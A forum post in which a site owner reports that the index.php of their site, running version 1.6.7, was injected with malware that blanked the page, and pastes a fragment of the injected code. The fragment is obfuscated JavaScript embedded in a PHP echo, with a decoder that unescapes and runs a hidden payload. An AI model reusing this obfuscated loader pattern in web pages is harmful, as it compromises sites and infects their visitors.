in 1.6.7 my index.php was injected with a virus/malware, it looks a bit like this variant.
http://nakedsecurity.sophos.com/2009/04 ... direction/
at first I didn't understand why my site was blank, but in the error log it showed:
Code: Select all
PHP Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in /sites/website.com/www/index.php on line 53
Here is a piece of the malware code starting at echo :
Code: Select all
else if (file_exists(TMP_CACHE_LOCATION.'/SITEDOWN'))
{
echo "<__html><head><title>Maintenance</title></head></__body><p>Site down for maintenance.</p><__script__ language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd = this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}